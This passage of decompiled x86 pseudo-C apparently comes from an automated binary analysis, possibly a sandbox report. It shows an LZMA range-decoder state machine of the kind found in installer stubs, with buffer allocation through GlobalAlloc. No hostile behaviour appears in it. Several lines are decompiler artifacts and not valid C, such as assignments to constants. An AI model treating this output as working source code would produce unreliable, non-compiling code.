                        						__ecx =  *(__ebp - 0x58);
                        						__eax =  *(__ebp - 0x4c) << 4;
                        						__eax =  *(__ebp - 0x58) + __eax + 4;
                        						L130:
                        						 *(__ebp - 0x58) = __eax;
                        						 *(__ebp - 0x40) = 3;
                        						L144:
                        						 *(__ebp - 0x7c) = 0x14;
                        						L145:
                        						__eax =  *(__ebp - 0x40);
                        						 *(__ebp - 0x50) = 1;
                        						 *(__ebp - 0x48) =  *(__ebp - 0x40);
                        						L149:
                        						if( *(__ebp - 0x48) <= 0) {
                        							__ecx =  *(__ebp - 0x40);
                        							__ebx =  *(__ebp - 0x50);
                        							0 = 1;
                        							__eax = 1 << __cl;
                        							__ebx =  *(__ebp - 0x50) - (1 << __cl);
                        							__eax =  *(__ebp - 0x7c);
                        							 *(__ebp - 0x44) = __ebx;
                        							while(1) {
                        								L140:
                        								 *(_t612 - 0x88) = _t533;
                        								while(1) {
                        									L1:
                        									_t534 =  *(_t612 - 0x88);
                        									if(_t534 > 0x1c) {
                        										break;
                        									}
                        									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                        										case 0:
                        											if( *(_t612 - 0x6c) == 0) {
                        												goto L170;
                        											}
                        											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                        											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                        											_t534 =  *( *(_t612 - 0x70));
                        											if(_t534 > 0xe1) {
                        												goto L171;
                        											}
                        											_t538 = _t534 & 0x000000ff;
                        											_push(0x2d);
                        											asm("cdq");
                        											_pop(_t569);
                        											_push(9);
                        											_pop(_t570);
                        											_t608 = _t538 / _t569;
                        											_t540 = _t538 % _t569 & 0x000000ff;
                        											asm("cdq");
                        											_t603 = _t540 % _t570 & 0x000000ff;
                        											 *(_t612 - 0x3c) = _t603;
                        											 *(_t612 - 0x1c) = (1 << _t608) - 1;
                        											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
                        											_t611 = (0x300 << _t603 + _t608) + 0x736;
                        											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
                        												L10:
                        												if(_t611 == 0) {
                        													L12:
                        													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
                        													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                        													goto L15;
                        												} else {
                        													goto L11;
                        												}
                        												do {
                        													L11:
                        													_t611 = _t611 - 1;
                        													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
                        												} while (_t611 != 0);
                        												goto L12;
                        											}
                        											if( *(_t612 - 4) != 0) {
                        												GlobalFree( *(_t612 - 4));
                        											}
                        											_t534 = GlobalAlloc(0x40, 0x600); // executed
                        											 *(_t612 - 4) = _t534;
                        											if(_t534 == 0) {
                        												goto L171;
                        											} else {
                        												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
                        												goto L10;
                        											}
                        										case 1:
                        											L13:
                        											__eflags =  *(_t612 - 0x6c);
                        											if( *(_t612 - 0x6c) == 0) {
                        												 *(_t612 - 0x88) = 1;
                        												goto L170;
                        											}
                        											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                        											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
                        											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                        											_t45 = _t612 - 0x48;
                        											 *_t45 =  *(_t612 - 0x48) + 1;
                        											__eflags =  *_t45;
                        											L15:
                        											if( *(_t612 - 0x48) < 4) {
                        												goto L13;
                        											}
                        											_t546 =  *(_t612 - 0x40);
                        											if(_t546 ==  *(_t612 - 0x74)) {
                        												L20:
                        												 *(_t612 - 0x48) = 5;
                        												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
                        												goto L23;
                        											}
                        											 *(_t612 - 0x74) = _t546;
                        											if( *(_t612 - 8) != 0) {
                        												GlobalFree( *(_t612 - 8));
                        											}
                        											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
                        											 *(_t612 - 8) = _t534;
                        											if(_t534 == 0) {
                        												goto L171;
                        											} else {
                        												goto L20;
                        											}
                        										case 2:
                        											L24:
                        											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
                        											 *(_t612 - 0x84) = 6;
                        											 *(_t612 - 0x4c) = _t553;
                        											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
                        											goto L132;
                        										case 3:
                        											L21:
                        											__eflags =  *(_t612 - 0x6c);
                        											if( *(_t612 - 0x6c) == 0) {
                        												 *(_t612 - 0x88) = 3;
                        												goto L170;
                        											}
                        											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                        											_t67 = _t612 - 0x70;
                        											 *_t67 =  &(( *(_t612 - 0x70))[1]);
                        											__eflags =  *_t67;
                        											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                        											L23:
                        											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
                        											if( *(_t612 - 0x48) != 0) {
                        												goto L21;
                        											}
                        											goto L24;
                        										case 4:
                        											L133:
                        											_t531 =  *_t605;
                        											_t588 = _t531 & 0x0000ffff;
                        											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
                        											if( *(_t612 - 0xc) >= _t564) {
                        												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
                        												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
                        												 *(_t612 - 0x40) = 1;
                        												_t532 = _t531 - (_t531 >> 5);
                        												__eflags = _t532;
                        												 *_t605 = _t532;
                        											} else {
                        												 *(_t612 - 0x10) = _t564;
                        												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                        												 *_t605 = (0x800 - _t588 >> 5) + _t531;
                        											}
                        											if( *(_t612 - 0x10) >= 0x1000000) {
                        												goto L139;
                        											} else {
                        												goto L137;
                        											}
                        										case 5:
                        											L137:
                        											if( *(_t612 - 0x6c) == 0) {
                        												 *(_t612 - 0x88) = 5;
                        												goto L170;
                        											}
                        											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
                        											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                        											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                        											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                        											L139:
                        											_t533 =  *(_t612 - 0x84);
                        											goto L140;
                        										case 6:
                        											__edx = 0;
                        											__eflags =  *(__ebp - 0x40);
                        											if( *(__ebp - 0x40) != 0) {
                        												__eax =  *(__ebp - 4);
                        												__ecx =  *(__ebp - 0x38);
                        												 *(__ebp - 0x34) = 1;
                        												 *(__ebp - 0x84) = 7;
                        												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                        												goto L132;
                        											}
                        											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                        											__esi =  *(__ebp - 0x60);
                        											__cl = 8;
                        											__cl = 8 -  *(__ebp - 0x3c);
                        											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                        											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                        											__ecx =  *(__ebp - 0x3c);
                        											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                        											__ecx =  *(__ebp - 4);
                        											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                        											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                        											__eflags =  *(__ebp - 0x38) - 4;
                        											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                        											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                        											if( *(__ebp - 0x38) >= 4) {
                        												__eflags =  *(__ebp - 0x38) - 0xa;
                        												if( *(__ebp - 0x38) >= 0xa) {
                        													_t98 = __ebp - 0x38;
                        													 *_t98 =  *(__ebp - 0x38) - 6;
                        													__eflags =  *_t98;
                        												} else {
                        													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                        												}
                        											} else {
                        												 *(__ebp - 0x38) = 0;
                        											}
                        											__eflags =  *(__ebp - 0x34) - __edx;
                        											if( *(__ebp - 0x34) == __edx) {
                        												__ebx = 0;
                        												__ebx = 1;
                        												goto L61;
                        											} else {
                        												__eax =  *(__ebp - 0x14);
                        												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                        												__eflags = __eax -  *(__ebp - 0x74);
                        												if(__eax >=  *(__ebp - 0x74)) {
                        													__eax = __eax +  *(__ebp - 0x74);
                        													__eflags = __eax;
                        												}
                        												__ecx =  *(__ebp - 8);
                        												__ebx = 0;
                        												__ebx = 1;
                        												__al =  *((intOrPtr*)(__eax + __ecx));
                        												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                        												goto L41;
                        											}
                        										case 7:
                        											__eflags =  *(__ebp - 0x40) - 1;
                        											if( *(__ebp - 0x40) != 1) {
                        												__eax =  *(__ebp - 0x24);
                        												 *(__ebp - 0x80) = 0x16;
                        												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                        												__eax =  *(__ebp - 0x28);
                        												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                        												__eax =  *(__ebp - 0x2c);
                        												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                        												__eax = 0;
                        												__eflags =  *(__ebp - 0x38) - 7;
                        												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                        												__al = __al & 0x000000fd;
                        												__eax = (__eflags >= 0) - 1 + 0xa;
                        												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                        												__eax =  *(__ebp - 4);
                        												__eax =  *(__ebp - 4) + 0x664;
                        												__eflags = __eax;
                        												 *(__ebp - 0x58) = __eax;
                        												goto L69;
                        											}
                        											__eax =  *(__ebp - 4);
                        											__ecx =  *(__ebp - 0x38);
                        											 *(__ebp - 0x84) = 8;
                        											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                        											goto L132;
                        										case 8:
                        											__eflags =  *(__ebp - 0x40);
                        											if( *(__ebp - 0x40) != 0) {
                        												__eax =  *(__ebp - 4);
                        												__ecx =  *(__ebp - 0x38);
                        												 *(__ebp - 0x84) = 0xa;
                        												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                        											} else {
                        												__eax =  *(__ebp - 0x38);
                        												__ecx =  *(__ebp - 4);
                        												__eax =  *(__ebp - 0x38) + 0xf;
                        												 *(__ebp - 0x84) = 9;
                        												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                        												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                        											}
                        											goto L132;
                        										case 9:
                        											__eflags =  *(__ebp - 0x40);
                        											if( *(__ebp - 0x40) != 0) {
                        												goto L90;
                        											}
                        											__eflags =  *(__ebp - 0x60);
                        											if( *(__ebp - 0x60) == 0) {
                        												goto L171;
                        											}
                        											__eax = 0;
                        											__eflags =  *(__ebp - 0x38) - 7;
                        											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                        											__eflags = _t259;
                        											0 | _t259 = _t259 + _t259 + 9;
                        											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                        											goto L76;
                        										case 0xa:
                        											__eflags =  *(__ebp - 0x40);
                        											if( *(__ebp - 0x40) != 0) {
                        												__eax =  *(__ebp - 4);
                        												__ecx =  *(__ebp - 0x38);
                        												 *(__ebp - 0x84) = 0xb;
                        												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                        												goto L132;
                        											}
                        											__eax =  *(__ebp - 0x28);
                        											goto L89;
                        										case 0xb:
                        											__eflags =  *(__ebp - 0x40);
                        											if( *(__ebp - 0x40) != 0) {
                        												__ecx =  *(__ebp - 0x24);
                        												__eax =  *(__ebp - 0x20);
                        												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                        											} else {
                        												__eax =  *(__ebp - 0x24);
                        											}
                        											__ecx =  *(__ebp - 0x28);
                        											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                        											L89:
                        											__ecx =  *(__ebp - 0x2c);
                        											 *(__ebp - 0x2c) = __eax;
                        											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                        											L90:
                        											__eax =  *(__ebp - 4);
                        											 *(__ebp - 0x80) = 0x15;
                        											__eax =  *(__ebp - 4) + 0xa68;
                        											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                        											goto L69;
                        										case 0xc:
                        											L100:
                        											__eflags =  *(__ebp - 0x6c);
                        											if( *(__ebp - 0x6c) == 0) {
                        												 *(__ebp - 0x88) = 0xc;
                        												goto L170;
                        											}
                        											__ecx =  *(__ebp - 0x70);
                        											__eax =  *(__ebp - 0xc);
                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        											_t335 = __ebp - 0x70;
                        											 *_t335 =  *(__ebp - 0x70) + 1;
                        											__eflags =  *_t335;
                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        											__eax =  *(__ebp - 0x2c);
                        											goto L102;
                        										case 0xd:
                        											L37:
                        											__eflags =  *(__ebp - 0x6c);
                        											if( *(__ebp - 0x6c) == 0) {
                        												 *(__ebp - 0x88) = 0xd;
                        												goto L170;
                        											}
                        											__ecx =  *(__ebp - 0x70);
                        											__eax =  *(__ebp - 0xc);
                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        											_t122 = __ebp - 0x70;
                        											 *_t122 =  *(__ebp - 0x70) + 1;
                        											__eflags =  *_t122;
                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        											L39:
                        											__eax =  *(__ebp - 0x40);
                        											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                        											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                        												goto L48;
                        											}
                        											__eflags = __ebx - 0x100;
                        											if(__ebx >= 0x100) {
                        												goto L54;
                        											}
                        											L41:
                        											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                        											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                        											__ecx =  *(__ebp - 0x58);
                        											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                        											 *(__ebp - 0x48) = __eax;
                        											__eax = __eax + 1;
                        											__eax = __eax << 8;
                        											__eax = __eax + __ebx;
                        											__esi =  *(__ebp - 0x58) + __eax * 2;
                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                        											__ax =  *__esi;
                        											 *(__ebp - 0x54) = __esi;
                        											__edx = __ax & 0x0000ffff;
                        											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                        											__eflags =  *(__ebp - 0xc) - __ecx;
                        											if( *(__ebp - 0xc) >= __ecx) {
                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                        												__cx = __ax;
                        												 *(__ebp - 0x40) = 1;
                        												__cx = __ax >> 5;
                        												__eflags = __eax;
                        												__ebx = __ebx + __ebx + 1;
                        												 *__esi = __ax;
                        											} else {
                        												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                        												 *(__ebp - 0x10) = __ecx;
                        												0x800 = 0x800 - __edx;
                        												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                        												__ebx = __ebx + __ebx;
                        												 *__esi = __cx;
                        											}
                        											__eflags =  *(__ebp - 0x10) - 0x1000000;
                        											 *(__ebp - 0x44) = __ebx;
                        											if( *(__ebp - 0x10) >= 0x1000000) {
                        												goto L39;
                        											} else {
                        												goto L37;
                        											}
                        										case 0xe:
                        											L46:
                        											__eflags =  *(__ebp - 0x6c);
                        											if( *(__ebp - 0x6c) == 0) {
                        												 *(__ebp - 0x88) = 0xe;
                        												goto L170;
                        											}
                        											__ecx =  *(__ebp - 0x70);
                        											__eax =  *(__ebp - 0xc);
                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        											_t156 = __ebp - 0x70;
                        											 *_t156 =  *(__ebp - 0x70) + 1;
                        											__eflags =  *_t156;
                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        											while(1) {
                        												L48:
                        												__eflags = __ebx - 0x100;
                        												if(__ebx >= 0x100) {
                        													break;
                        												}
                        												__eax =  *(__ebp - 0x58);
                        												__edx = __ebx + __ebx;
                        												__ecx =  *(__ebp - 0x10);
                        												__esi = __edx + __eax;
                        												__ecx =  *(__ebp - 0x10) >> 0xb;
                        												__ax =  *__esi;
                        												 *(__ebp - 0x54) = __esi;
                        												__edi = __ax & 0x0000ffff;
                        												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                        												__eflags =  *(__ebp - 0xc) - __ecx;
                        												if( *(__ebp - 0xc) >= __ecx) {
                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                        													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                        													__cx = __ax;
                        													_t170 = __edx + 1; // 0x1
                        													__ebx = _t170;
                        													__cx = __ax >> 5;
                        													__eflags = __eax;
                        													 *__esi = __ax;
                        												} else {
                        													 *(__ebp - 0x10) = __ecx;
                        													0x800 = 0x800 - __edi;
                        													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                        													__ebx = __ebx + __ebx;
                        													 *__esi = __cx;
                        												}
                        												__eflags =  *(__ebp - 0x10) - 0x1000000;
                        												 *(__ebp - 0x44) = __ebx;
                        												if( *(__ebp - 0x10) >= 0x1000000) {
                        													continue;
                        												} else {
                        													goto L46;
                        												}
                        											}
                        											L54:
                        											_t173 = __ebp - 0x34;
                        											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                        											__eflags =  *_t173;
                        											goto L55;
                        										case 0xf:
                        											L58:
                        											__eflags =  *(__ebp - 0x6c);
                        											if( *(__ebp - 0x6c) == 0) {
                        												 *(__ebp - 0x88) = 0xf;
                        												goto L170;
                        											}
                        											__ecx =  *(__ebp - 0x70);
                        											__eax =  *(__ebp - 0xc);
                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        											_t203 = __ebp - 0x70;
                        											 *_t203 =  *(__ebp - 0x70) + 1;
                        											__eflags =  *_t203;
                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        											L60:
                        											__eflags = __ebx - 0x100;
                        											if(__ebx >= 0x100) {
                        												L55:
                        												__al =  *(__ebp - 0x44);
                        												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                        												goto L56;
                        											}
                        											L61:
                        											__eax =  *(__ebp - 0x58);
                        											__edx = __ebx + __ebx;
                        											__ecx =  *(__ebp - 0x10);
                        											__esi = __edx + __eax;
                        											__ecx =  *(__ebp - 0x10) >> 0xb;
                        											__ax =  *__esi;
                        											 *(__ebp - 0x54) = __esi;
                        											__edi = __ax & 0x0000ffff;
                        											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                        											__eflags =  *(__ebp - 0xc) - __ecx;
                        											if( *(__ebp - 0xc) >= __ecx) {
                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                        												__cx = __ax;
                        												_t217 = __edx + 1; // 0x1
                        												__ebx = _t217;
                        												__cx = __ax >> 5;
                        												__eflags = __eax;
                        												 *__esi = __ax;
                        											} else {
                        												 *(__ebp - 0x10) = __ecx;
                        												0x800 = 0x800 - __edi;
                        												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                        												__ebx = __ebx + __ebx;
                        												 *__esi = __cx;
                        											}
                        											__eflags =  *(__ebp - 0x10) - 0x1000000;
                        											 *(__ebp - 0x44) = __ebx;
                        											if( *(__ebp - 0x10) >= 0x1000000) {
                        												goto L60;
                        											} else {
                        												goto L58;
                        											}
                        										case 0x10:
                        											L110:
                        											__eflags =  *(__ebp - 0x6c);
                        											if( *(__ebp - 0x6c) == 0) {
                        												 *(__ebp - 0x88) = 0x10;
                        												goto L170;
                        											}
                        											__ecx =  *(__ebp - 0x70);
                        											__eax =  *(__ebp - 0xc);
                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        											_t366 = __ebp - 0x70;
                        											 *_t366 =  *(__ebp - 0x70) + 1;
                        											__eflags =  *_t366;
                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        											goto L112;
                        										case 0x11:
                        											L69:
                        											__esi =  *(__ebp - 0x58);
                        											 *(__ebp - 0x84) = 0x12;
                        											L132:
                        											 *(_t612 - 0x54) = _t605;
                        											goto L133;
                        										case 0x12:
                        											goto L0;
                        										case 0x13:
                        											__eflags =  *(__ebp - 0x40);
                        											if( *(__ebp - 0x40) != 0) {
                        												_t469 = __ebp - 0x58;
                        												 *_t469 =  *(__ebp - 0x58) + 0x204;
                        												__eflags =  *_t469;
                        												 *(__ebp - 0x30) = 0x10;
                        												 *(__ebp - 0x40) = 8;
                        												goto L144;
                        											}
                        											__eax =  *(__ebp - 0x4c);
                        											__ecx =  *(__ebp - 0x58);
                        											__eax =  *(__ebp - 0x4c) << 4;
                        											 *(__ebp - 0x30) = 8;
                        											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                        											goto L130;
                        										case 0x14:
                        											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                        											__eax =  *(__ebp - 0x80);
                        											L140:
                        											 *(_t612 - 0x88) = _t533;
                        											goto L1;
                        										case 0x15:
                        											__eax = 0;
                        											__eflags =  *(__ebp - 0x38) - 7;
                        											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                        											__al = __al & 0x000000fd;
                        											__eax = (__eflags >= 0) - 1 + 0xb;
                        											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                        											goto L121;
                        										case 0x16:
                        											__eax =  *(__ebp - 0x30);
                        											__eflags = __eax - 4;
                        											if(__eax >= 4) {
                        												_push(3);
                        												_pop(__eax);
                        											}
                        											__ecx =  *(__ebp - 4);
                        											 *(__ebp - 0x40) = 6;
                        											__eax = __eax << 7;
                        											 *(__ebp - 0x7c) = 0x19;
                        											 *(__ebp - 0x58) = __eax;
                        											goto L145;
                        										case 0x17:
                        											goto L145;
                        										case 0x18:
                        											L146:
                        											__eflags =  *(__ebp - 0x6c);
                        											if( *(__ebp - 0x6c) == 0) {
                        												 *(__ebp - 0x88) = 0x18;
                        												goto L170;
                        											}
                        											__ecx =  *(__ebp - 0x70);
                        											__eax =  *(__ebp - 0xc);
                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        											_t484 = __ebp - 0x70;
                        											 *_t484 =  *(__ebp - 0x70) + 1;
                        											__eflags =  *_t484;
                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        											L148:
                        											_t487 = __ebp - 0x48;
                        											 *_t487 =  *(__ebp - 0x48) - 1;
                        											__eflags =  *_t487;
                        											goto L149;
                        										case 0x19:
                        											__eflags = __ebx - 4;
                        											if(__ebx < 4) {
                        												 *(__ebp - 0x2c) = __ebx;
                        												L120:
                        												_t394 = __ebp - 0x2c;
                        												 *_t394 =  *(__ebp - 0x2c) + 1;
                        												__eflags =  *_t394;
                        												L121:
                        												__eax =  *(__ebp - 0x2c);
                        												__eflags = __eax;
                        												if(__eax == 0) {
                        													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                        													goto L170;
                        												}
                        												__eflags = __eax -  *(__ebp - 0x60);
                        												if(__eax >  *(__ebp - 0x60)) {
                        													goto L171;
                        												}
                        												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                        												__eax =  *(__ebp - 0x30);
                        												_t401 = __ebp - 0x60;
                        												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                        												__eflags =  *_t401;
                        												goto L124;
                        											}
                        											__ecx = __ebx;
                        											__eax = __ebx;
                        											__ecx = __ebx >> 1;
                        											__eax = __ebx & 0x00000001;
                        											__ecx = (__ebx >> 1) - 1;
                        											__al = __al | 0x00000002;
                        											__eax = (__ebx & 0x00000001) << __cl;
                        											__eflags = __ebx - 0xe;
                        											 *(__ebp - 0x2c) = __eax;
                        											if(__ebx >= 0xe) {
                        												__ebx = 0;
                        												 *(__ebp - 0x48) = __ecx;
                        												L103:
                        												__eflags =  *(__ebp - 0x48);
                        												if( *(__ebp - 0x48) <= 0) {
                        													__eax = __eax + __ebx;
                        													 *(__ebp - 0x40) = 4;
                        													 *(__ebp - 0x2c) = __eax;
                        													__eax =  *(__ebp - 4);
                        													__eax =  *(__ebp - 4) + 0x644;
                        													__eflags = __eax;
                        													L109:
                        													__ebx = 0;
                        													 *(__ebp - 0x58) = __eax;
                        													 *(__ebp - 0x50) = 1;
                        													 *(__ebp - 0x44) = 0;
                        													 *(__ebp - 0x48) = 0;
                        													L113:
                        													__eax =  *(__ebp - 0x40);
                        													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                        													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                        														_t392 = __ebp - 0x2c;
                        														 *_t392 =  *(__ebp - 0x2c) + __ebx;
                        														__eflags =  *_t392;
                        														goto L120;
                        													}
                        													__eax =  *(__ebp - 0x50);
                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                        													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                        													__eax =  *(__ebp - 0x58);
                        													__esi = __edi + __eax;
                        													 *(__ebp - 0x54) = __esi;
                        													__ax =  *__esi;
                        													__ecx = __ax & 0x0000ffff;
                        													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                        													__eflags =  *(__ebp - 0xc) - __edx;
                        													if( *(__ebp - 0xc) >= __edx) {
                        														__ecx = 0;
                        														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                        														__ecx = 1;
                        														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                        														__ebx = 1;
                        														__ecx =  *(__ebp - 0x48);
                        														__ebx = 1 << __cl;
                        														__ecx = 1 << __cl;
                        														__ebx =  *(__ebp - 0x44);
                        														__ebx =  *(__ebp - 0x44) | __ecx;
                        														__cx = __ax;
